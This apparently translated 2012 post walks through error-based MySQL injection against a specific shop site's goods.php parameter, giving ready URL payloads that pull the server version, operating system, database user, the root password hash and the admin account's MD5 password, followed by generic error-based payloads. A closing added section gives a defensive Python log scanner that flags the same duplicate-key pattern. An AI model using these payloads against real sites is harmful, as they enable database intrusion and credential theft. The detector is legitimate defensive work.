Blind injection details
Posted on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
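Every payload above relies on the same three ingredients, count(*) plus a concat(..., floor(rand()*2)) key plus GROUP BY, which together make MySQL raise a "Duplicate entry" error carrying the selected value; a defender can therefore key a log detector on that combination instead of on single keywords that also occur in benign requests. The following is an added example, not code from the post; it assumes combined-format web server access logs, and the log lines are constructed (the second one carries the @@version payload from above, the third is a harmless lookalike).

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed sample of a combined-format access log (not taken from the post).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5123
203.0.113.5 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 0
203.0.113.7 - - [05/Sep/2012:15:01:02 +0800] "GET /search.php?q=rand%20group%20by%20date HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# The three pieces that make MySQL raise "Duplicate entry ... for key 'group_key'":
# an aggregate, a non-deterministic floor(rand()*2) key, and GROUP BY over it.
DUPKEY_PARTS = [
    re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    re.compile(r"group\s+by", re.I),
]
# Reconnaissance targets used in the payloads above.
RECON_RE = re.compile(r"information_schema|@@version|mysql\.user|user\(\)|database\(\)", re.I)


def decode_query(url: str) -> str:
    """Return the query string, URL-decoded twice to catch double encoding."""
    query = url.partition("?")[2]
    return unquote_plus(unquote_plus(query))


def classify(url: str) -> Optional[str]:
    """Label a request URL, or return None when nothing suspicious is present."""
    q = decode_query(url)
    recon = bool(RECON_RE.search(q))
    if all(p.search(q) for p in DUPKEY_PARTS):
        return "error-based-sqli+recon" if recon else "error-based-sqli"
    return "db-recon" if recon else None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, label) for each log line whose request looks like an attack."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            label = classify(m.group(1))
            if label:
                hits.append((line.split()[0], label))
    return hits
```

Running scan_log(SAMPLE_LOG) flags only the second line; the benign "rand group by date" search is not reported because count(*) and floor(rand( are absent.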